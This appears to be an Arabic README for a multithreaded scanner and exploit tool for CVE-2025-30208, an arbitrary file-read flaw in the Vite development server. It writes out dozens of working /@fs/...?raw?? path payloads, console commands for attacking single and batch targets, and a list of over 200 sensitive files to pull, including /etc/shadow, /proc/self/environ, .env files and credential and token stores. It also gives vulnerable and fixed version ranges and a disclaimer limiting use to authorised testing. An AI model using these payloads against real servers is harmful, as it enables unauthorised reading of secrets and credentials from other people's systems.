
CVE‑2025‑30208 هي ثغرة قراءة ملف عشوائية متوسطة الخطورة في خادم تطوير Vite (أداة بناء واجهات أمامية شائعة).
ماسح متقدم لثغرة CVE-2025-30208 مع ميزات على مستوى المؤسسات
أداة اختبار اختراق احترافية لاكتشاف ثغرة قراءة الملفات العشوائية في Vite
🚀 بداية سريعة • 📋 الميزات • 🔧 الاستخدام • 📊 أمثلة • 🛡️ الأمان
هذه أداة ماسح شاملة مصممة لاكتشاف واستغلال ثغرة CVE-2025-30208 في خوادم تطوير Vite. تسمح الثغرة بقراءة الملفات بشكل عشوائي عبر نقاط نهاية نظام الملفات في Vite، مما قد يعرض ملفات التكوين الحساسة، كود المصدر، ومعلومات النظام.
تتميز الأداة الآن بـ بنية معيارية لسهولة الصيانة والتوسع:
CVE-2025-30208.py - تطبيق الماسح الرئيسيpayloads.py - حمولات استغلال متقدمة (أكثر من 60 متغيرًا)sensitive_files.py - قاعدة بيانات شاملة للملفات الحساسة (أكثر من 200 ملف)html_template.py - قالب تقارير HTML محسّن بأسلوب الهاكرزpip3 install -r requirements.txt
python3 CVE-2025-30208.py
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > set FILEPATH etc/passwd
CVE-2025-30208 > test
CVE-2025-30208 > run
# تمكين وضع التفصيل للحصول على مخرجات مفصلة
CVE-2025-30208 > verbose
CVE-2025-30208 > run
CVE-2025-30208 > set THREADS 10
CVE-2025-30208 > batch
192.168.1.100:3000
192.168.1.101:3000
192.168.1.102:3000
[اضغط Enter مرتين للإنهاء]
CVE-2025-30208 > scan
# تكوين الوكيل
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
# تعيين رؤوس مخصصة
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Custom Scanner"}
# تكوين تحديد السرعة
CVE-2025-30208 > rate
Enter rate limit: 1.0
# إنشاء تقرير HTML جميل
CVE-2025-30208 > pull
# بدء خادم ويب لعرض التقرير
CVE-2025-30208 > web
# بدء خادم ويب على منفذ محدد
CVE-2025-30208 > web 8081
# إيقاف خادم الويب
CVE-2025-30208 > web off
يستخدم الماسح الآن أكثر من 60 متغيرًا مختلفًا من الحمولات منظمة في payloads.py:
/@fs/{file_path}?raw??
/@fs/{file_path}?raw&url
/@fs/{file_path}?import&raw??
/@fs/{file_path}?raw&import
/@fs/{file_path}?import&url
/@fs/{file_path}?raw&source
/@fs/{file_path}?raw&content
/@fs/{file_path}?raw&data
/@fs/{file_path}?raw&file
/@fs/{file_path}?raw&type=text
/@fs/{file_path}?raw&format=text
/@fs/{file_path}?raw&encoding=utf8
/@fs/{file_path}?raw&vite&dev
/@fs/{file_path}?raw&vite&hot
/@fs/{file_path}?raw&vite&hmr
/@fs/{file_path}?raw&development
/@fs/{file_path}?raw&debug
/@fs/{file_path}?raw&esm
/@fs/{file_path}?raw&cjs
/@fs/{file_path}?raw&umd
/@fs/{file_path}?raw&js
/@fs/{file_path}?raw&ts
/@fs/{file_path}?raw&json
/@fs/{file_path}?raw&css
/@fs/{file_path}?raw&html
/app/{file_path}?raw??
/App/{file_path}?raw??
تختبر الأداة الآن أكثر من 200 ملف حساس منظمة في sensitive_files.py:
/etc/passwd - معلومات حسابات المستخدمين/etc/shadow - بيانات كلمة المرور المشفرة/etc/services - خدمات الشبكة/etc/hosts - تعيينات أسماء المضيفين/etc/fstab - جدول نظام الملفات/etc/ssh/sshd_config - إعدادات خادم SSH/etc/crontab - مهام cron النظامية/etc/sudoers - إعدادات sudo/proc/version - إصدار النواة/proc/cpuinfo - معلومات وحدة المعالجة المركزية/proc/meminfo - معلومات الذاكرة/proc/self/environ - بيئة العملية/proc/self/cmdline - سطر أوامر العملية/proc/net/tcp - اتصالات TCP/proc/net/udp - اتصالات UDP.env - متغيرات البيئة.env.local - البيئة المحلية.env.production - بيئة الإنتاجconfig.json - تكوين التطبيقsettings.json - إعدادات التطبيقapplication.properties - تكوين Springapplication.yml - تكوين YAMLdatabase.yml - تكوين قاعدة البياناتsecrets.json - إدارة الأسرارpackage.json - تبعيات Node.jspackage-lock.json - تبعيات مقفلةyarn.lock - ملف قفل Yarnvite.config.js - تكوين Vitevite.config.ts - تكوين Vite TypeScripttsconfig.json - تكوين TypeScriptwebpack.config.js - تكوين Webpacknext.config.js - تكوين Next.jsnuxt.config.js - تكوين Nuxt.jsangular.json - تكوين Angularvue.config.js - تكوين Vue.jsrollup.config.js - تكوين Rollupeslint.config.js - تكوين ESLint.git/config - تكوين Git.gitignore - قواعد تجاهل Git.gitattributes - سمات Git.gitmodules - وحدات Git الفرعية.git/HEAD - الفرع الحالي.git/logs/HEAD - سجلات Git.git/refs/heads/master - الفرع الرئيسي.git/refs/heads/main - الفرع الرئيسيREADME.md - توثيق المشروعCHANGELOG.md - سجل التغييراتLICENSE - معلومات الترخيصCONTRIBUTING.md - إرشادات المساهمةAUTHORS - معلومات المؤلفينTODO.md - قائمة المهامROADMAP.md - خارطة التطويرDockerfile - تكوين Dockerdocker-compose.yml - Docker Composedocker-compose.override.yml - تكوين التجاوز.dockerignore - قواعد تجاهل Dockerdocker-compose.prod.yml - تكوين الإنتاجdocker-compose.dev.yml - تكوين التطويرnginx.conf - تكوين Nginxapache2.conf - تكوين Apachehttpd.conf - تكوين HTTP daemon.htaccess - التحكم في الوصول Apacheweb.config - تكوين IISrobots.txt - توجيهات محركات البحثsitemap.xml - هيكل الموقعmanifest.json - بيان تطبيق الويبsw.js - عامل الخدمةfirebase.json - تكوين Firebasefirebase.rules - قواعد أمان Firebaseboot.ini - تكوين الإقلاعautoexec.bat - سكريبت التنفيذ التلقائيsystem.ini - تكوين النظامwin.ini - تكوين WindowsUsers - أدلة المستخدمينWindows - ملفات النظامProgram Files - أدلة التطبيقاتSystem - ملفات النظامLibrary - ملفات المكتبةApplications - ملفات التطبيقاتprivate/etc/hosts - ملف المضيفينprivate/etc/passwd - حسابات المستخدمينdatabase.db - قاعدة بيانات SQLitedatabase.sqlite - قاعدة بيانات SQLitedata.db - قاعدة بياناتdump.sql - تصدير قاعدة البياناتschema.sql - مخطط قاعدة البياناتmigrations - ترحيلات قاعدة البياناتlogs - دليل السجلاتerror.log - سجلات الأخطاءaccess.log - سجلات الوصولapp.log - سجلات التطبيقdebug.log - سجلات التصحيحcombined.log - سجلات مجمعةbackup - دليل النسخ الاحتياطيbackup.sql - نسخة احتياطية لقاعدة البياناتbackup.zip - نسخة احتياطية مضغوطةdump - تفريغ البياناتexport - تصدير البياناتauth.json - تكوين المصادقةcredentials.json - تخزين بيانات الاعتمادkeys.json - إدارة المفاتيحtokens.json - تخزين الرموز المميزةjwt.json - تكوين JWToauth.json - تكوين OAuthapi.json - تكوين APIswagger.json - توثيق APIopenapi.json - مواصفات OpenAPIgraphql.json - تكوين GraphQLschema.json - مخطط APIcloudformation.yml - AWS CloudFormationserverless.yml - تكوين Serverlessterraform.tf - تكوين Terraformkubernetes.yml - تكوين Kubernetesk8s.yml - تكوين Kubernetesanalytics.json - تكوين التحليلاتmonitoring.json - إعداد المراقبةmetrics.json - تكوين المقاييسtelemetry.json - بيانات القياس عن بعدتولد الأداة الآن تقارير HTML جميلة بأسلوب الهاكرز مع:
6.2.0 ≤ Vite ≤ 6.2.2
6.1.0 ≤ Vite ≤ 6.1.1
6.0.0 ≤ Vite ≤ 6.0.11
5.0.0 ≤ Vite ≤ 5.4.14
Vite ≤ 4.5.9
Vite ≥ 6.2.3
6.1.2 ≤ Vite < 6.2.0
6.0.12 ≤ Vite < 6.1.0
5.4.15 ≤ Vite < 6.0.0
4.5.10 ≤ Vite < 5.0.0
CVE-2025-30208 > set THREADS 20
CVE-2025-30208 > set RATE_LIMIT 0.5
CVE-2025-30208 > set TIMEOUT 10
CVE-2025-30208 > verbose
CVE-2025-30208 > batch
CVE-2025-30208 > proxy
Enter proxy: http://127.0.0.1:8080
CVE-2025-30208 > headers
Enter headers: {"User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36"}
CVE-2025-30208 > set RATE_LIMIT 2.0
CVE-2025-30208 > run
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > run
CVE-2025-30208 > pull
CVE-2025-30208 > web 8080
CVE-2025-30208 > set RHOST 192.168.1.100
CVE-2025-30208 > set RPORT 3000
CVE-2025-30208 > scan
CVE-2025-30208/
├── CVE-2025-30208.py # تطبيق الماسح الرئيسي
├── payloads.py # حمولات استغلال متقدمة (أكثر من 60)
├── sensitive_files.py # قاعدة بيانات الملفات الحساسة (أكثر من 200)
├── html_template.py # قالب تقارير HTML محسّن
├── README.md # هذا التوثيق
├── requirements.txt # تبعيات Python
├── logs/ # دليل ملفات السجل
├── data_leak.html # تقارير HTML المُنشأة
├── data_leak.json # تقارير JSON المُنشأة
└── session.json # تكوينات الجلسة المحفوظة
نرحب بالمساهمات لتحسين هذه الأداة:
payloads.pysensitive_files.pyhtml_template.pyهذا المشروع مرخص لـ أغراض الاختبارات الأمنية التعليمية والمصرح بها فقط.
⚠️ إخلاء مسؤولية قانوني: هذه الأداة مخصصة لأغراض الاختبارات الأمنية والبحث المصرح بها فقط. المستخدمون مسؤولون عن ضمان حصولهم على الترخيص المناسب قبل اختبار أي أنظمة. المؤلفون ليسوا مسؤولين عن أي إساءة استخدام لهذه الأداة.
⭐ إذا ساعدتك هذه الأداة، يرجى منحها نجمة! ⭐
بُنيت بحب ❤️ لمجتمع الأمان
| الأمر | الوصف | مثال |
|---|
set <option> <value> | تعيين خيارات التكوين | set RHOST 192.168.1.100 |
show options | عرض الإعدادات الحالية | show options |
edit | محرر خيارات تفاعلي | edit |
run / exploit | تشغيل اختبار الثغرة | run |
batch | فحص دفعي لأهداف متعددة | batch |
scan | اكتشاف الملفات الحساسة | scan |
pull | تصدير النتائج إلى HTML/JSON | pull |
web [on|off|port] | خادم ويب لتقارير HTML | web 8080 |
save | حفظ تكوين الجلسة | save |
load | تحميل تكوين الجلسة | load |
test | اختبار الاتصال بالهدف | test |
validate | التحقق من صحة التكوين الحالي | validate |
verbose | تبديل وضع التفصيل | verbose |
proxy | تكوين إعدادات الوكيل | proxy |
headers | تعيين رؤوس HTTP مخصصة | headers |
rate | تكوين تحديد السرعة | rate |
log | عرض معلومات التسجيل | log |
help / ? | عرض المساعدة | help |
exit / quit | الخروج من الأداة | exit |
| الخيار | الوصف | الافتراضي | التحقق |
|---|
RHOST | المضيف/عنوان IP الهدف | - | التحقق من صحة اسم المضيف/IP |
RPORT | رقم منفذ الهدف | - | نطاق المنافذ (1-65535) |
FILEPATH | مسار الملف للاختبار | etc/passwd | التحقق من صحة المسار |
PROXY | عنوان URL للوكيل HTTP/HTTPS | - | التحقق من صحة تنسيق URL |
VERBOSE | تمكين المخرجات التفصيلية | false | التحقق من صحة القيمة المنطقية |
RATE_LIMIT | التأخير بين الطلبات (بالثواني) | 0.3 | التحقق من صحة الرقم |
THREADS | عدد الخيوط للفحص الدفعي | 5 | التحقق من صحة العدد الصحيح |
TIMEOUT | مهلة الطلب (بالثواني) | 5 | التحقق من صحة العدد الصحيح |
CUSTOM_HEADERS | رؤوس HTTP مخصصة (JSON) | {} | التحقق من صحة تنسيق JSON |
prettier.config.js - تكوين Prettierjest.config.js - تكوين Jestbabel.config.js - تكوين Babeltailwind.config.js - تكوين Tailwind CSS| الملف | الوصف | التنسيق |
|---|
data_leak.html | تقرير ثغرات HTML محسّن بأسلوب الهاكرز | HTML |
data_leak.json | تصدير JSON منظم | JSON |
sensitive_files_discovery.json | الملفات الحساسة المكتشفة | JSON |
session.json | تكوين الجلسة المحفوظة | JSON |
logs/cve_2025_30208_YYYYMMDD_HHMMSS.log | سجلات تدقيق مفصلة | نص |